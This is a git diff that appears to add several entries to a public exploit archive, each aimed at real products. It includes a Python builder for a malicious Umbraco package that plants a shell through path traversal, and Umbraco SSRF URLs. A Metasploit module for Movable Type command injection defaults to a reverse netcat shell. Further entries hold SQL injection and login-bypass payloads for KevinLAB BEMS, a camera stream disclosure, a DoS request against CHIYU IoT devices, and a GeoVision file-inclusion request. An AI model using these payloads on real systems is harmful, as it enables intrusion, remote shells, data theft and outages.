diff --git a/exploits/aspx/webapps/50241.py b/exploits/aspx/webapps/50241.py
new file mode 100755
index 000000000..f4f22656b
--- /dev/null
+++ b/exploits/aspx/webapps/50241.py
@@ -0,0 +1,72 @@
+# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
+# Exploit Author: BitTheByte
+# Description: Authenticated path traversal vulnerability.
+# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
+# Vendor Homepage: https://umbraco.com/
+# Version: <= 8.9.1
+# CVE : CVE-2020-5811
+
+import string
+import random
+import argparse
+import zipfile
+import os
+
+package_xml = f"""
+
+
+
+ {{filename}}
+ {{upload_path}}
+ {{filename}}
+
+
+
+
+ PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}
+ 1.0.0
+
+ MIT License
+ https://example.com
+
+ 0
+ 0
+ 0
+
+
+
+ CVE-2020-5811
+ https://example.com
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+"""
+
+parser = argparse.ArgumentParser(description='CVE-2020-5811')
+parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
+parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
+args = parser.parse_args()
+
+if not os.path.isfile(args.shell):
+ print("[ERROR] please use a correct path for the shell file.")
+
+output_file = "exploit.zip"
+
+package = zipfile.ZipFile(output_file, 'w')
+package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
+package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
+package.close()
+
+print(f"[DONE] Created Umbraco package: {output_file}")
\ No newline at end of file
diff --git a/exploits/aspx/webapps/50462.txt b/exploits/aspx/webapps/50462.txt
new file mode 100644
index 000000000..40e435432
--- /dev/null
+++ b/exploits/aspx/webapps/50462.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
+# Date: July 5, 2021
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://our.umbraco.com/
+# Software Link: https://our.umbraco.com/download/releases/8141
+# Version: v8.14.1
+# Affect: Umbraco CMS v8.14.1, Umbraco Cloud
+
+Vulnerable code:
+
+Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
+https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
+Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
+https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
+Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
+https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91
+
+PoC:
+
+/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
+/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
+https://SSRF-HOST.EXAMPLE/
+/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/
+
+Notes:
+- There's no "/" suffix in payload 1
+- "/" suffix is required in payload 2 and payload 3
+- "section" parameter value must be changed each exploit attempt
\ No newline at end of file
diff --git a/exploits/cgi/webapps/50464.rb b/exploits/cgi/webapps/50464.rb
new file mode 100755
index 000000000..15ed8400b
--- /dev/null
+++ b/exploits/cgi/webapps/50464.rb
@@ -0,0 +1,112 @@
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Movable Type XMLRPC API Remote Command Injection",
+ 'Description' => %q{
+ This module exploit Movable Type XMLRPC API Remote Command Injection.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Etienne Gervais', # author & msf module,
+ 'Charl-Alexandre Le Brun' # author & msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2021-20837'],
+ ['URL', 'https://movabletype.org/'],
+ ['URL', 'https://nemesis.sh/']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => false,
+ },
+ 'Platform' => ['linux'],
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => false,
+ 'DisclosureDate' => "2021-10-20",
+ 'DefaultTarget' => 0,
+ 'Targets' => [
+ [
+ 'Automatic (Unix In-Memory)',
+ {
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_memory,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
+ }
+ ]
+ ]
+ ))
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [ true, 'The URI of the MovableType', '/cgi-bin/mt/'])
+ ], self.class
+ )
+ end
+
+ def cmd_to_xml(cmd, opts={})
+ base64_cmd = Rex::Text.encode_base64("`"+cmd+"`")
+ xml_body = <<~THISSTRING
+
+
+ mt.handler_to_coderef
+
+
+
+
+ #{base64_cmd}
+
+
+
+
+
+ THISSTRING
+ end
+
+ def check
+ begin
+ fingerprint = Rex::Text.rand_text_alpha(32)
+ command_payload = cmd_to_xml("echo "+fingerprint)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => command_payload
+ })
+
+ fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+ fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200
+
+ if res && res.body.include?("Can't locate "+fingerprint)
+ return Exploit::CheckCode::Vulnerable
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ begin
+ command_payload = cmd_to_xml(payload.raw)
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => command_payload
+ })
+
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+
+ end
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49459.txt b/exploits/hardware/webapps/49459.txt
new file mode 100644
index 000000000..14c307200
--- /dev/null
+++ b/exploits/hardware/webapps/49459.txt
@@ -0,0 +1,67 @@
+# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
+# Date: 07.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: Model: iZero
+ Targa 512
+ Targa 504
+ Targa Semplice
+ Targa 704 TKM
+ Targa 805
+ Targa 710 INOX
+ Targa 750
+ Targa 704 ILB
+ Firmware: BLD201113005214
+ BLD201106163745
+ BLD200304170901
+ BLD200304170514
+ BLD200303143345
+ BLD191118145435
+ BLD191021180140
+ BLD191021180140
+ CPS: 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: IP camera with optical character recognition (OCR) software for automatic
+number plate recognition (ANPR) also equipped with ADR system that enables it to read
+the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
+of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
+plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
+this camera suitable for all installation conditions. Its built-in OCR software works
+as an automatic and independent system without the need of a computer, thus giving
+autonomy to the device even in the event of an interruption in the connection between
+the camera and the operations centre.
+
+Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream
+disclosure when p1.mjpg or p1.264 is called.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+ PHP/5.6.22
+ selea_httpd
+ HttpServer/0.1
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5619
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
+
+
+07.11.2020
+
+--
+
+
+Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264
+Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49937.txt b/exploits/hardware/webapps/49937.txt
new file mode 100644
index 000000000..30aea47af
--- /dev/null
+++ b/exploits/hardware/webapps/49937.txt
@@ -0,0 +1,47 @@
+# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
+# Date: 01/06/2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
+# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
+# CVE: CVE-2021-31642
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
+CVE ID: CVE-2021-31642
+CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
+
+Affected parameter: page=Component: if.cgi
+Payload:
+if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+
+====HTTP request======
+GET
+/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/AccLog.htm
+Cookie: fresh=
+Upgrade-Insecure-Requests: 1
+
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to the CGI component (if.cgi)
+ 3. Append the payload at the end of the vulnerable parameter (page)
+ 4. Submit the request and observe payload execution
+
+
+ Mitigation: The latest version of the CHIYU firmware should be installed
+to mitigate this vulnerability.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50146.txt b/exploits/hardware/webapps/50146.txt
new file mode 100644
index 000000000..b4ae9538b
--- /dev/null
+++ b/exploits/hardware/webapps/50146.txt
@@ -0,0 +1,62 @@
+# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
+# Date: 05.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kevinlab.com
+
+Vendor: KevinLAB Inc.
+Product web page: http://www.kevinlab.com
+Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
+
+Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
+management platform. KevinLAB's BEMS (Building Energy Management System) enables
+efficient energy management in buildings. It improves the efficient of energy use
+by collecting and analyzing various information of energy usage and facilities in
+the building. It also manages energy usage, facility efficiency and indoor environment
+control.
+
+Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
+Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
+sanitised before being returned to the user or used in SQL queries. This can be exploited
+to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
+mechanism.
+
+Tested on: Linux CentOS 7
+ Apache 2.4.6
+ Python 2.7.5
+ PHP 5.4.16
+ MariaDB 5.5.68
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5655
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
+
+
+05.07.2021
+
+--
+
+
+PoC POST data payload (extract):
+--------------------------------
+
+POST /http/index.php HTTP/1.1
+Host: 192.168.1.3
+
+requester=login
+request=login
+params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
+
+
+PoC POST data payload (authbypass):
+-----------------------------------
+
+POST /http/index.php HTTP/1.1
+Host: 192.168.1.3
+
+requester=login
+request=login
+params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50172.txt b/exploits/hardware/webapps/50172.txt
new file mode 100644
index 000000000..54042d3ff
--- /dev/null
+++ b/exploits/hardware/webapps/50172.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
+# Date: 13.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.panasonic.com
+
+
+
+
+ [CSRF]
+[Anonymous user log in = ON]
+orororororororororororororor
+ [Change admin password]
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/50211.txt b/exploits/hardware/webapps/50211.txt
new file mode 100644
index 000000000..ac43f9743
--- /dev/null
+++ b/exploits/hardware/webapps/50211.txt
@@ -0,0 +1,37 @@
+# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
+# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
+# Date: 6-16-21 (Vendor Notified)
+# Exploit Author: Ken 's1ngular1ty' Pyle
+# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
+# Version: <= 5.3.3
+# Tested on: Windows 20XX / MULTIPLE
+# CVE : https://www.geovision.com.tw/cyber_security.php
+
+GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
+
+Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
+
+GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=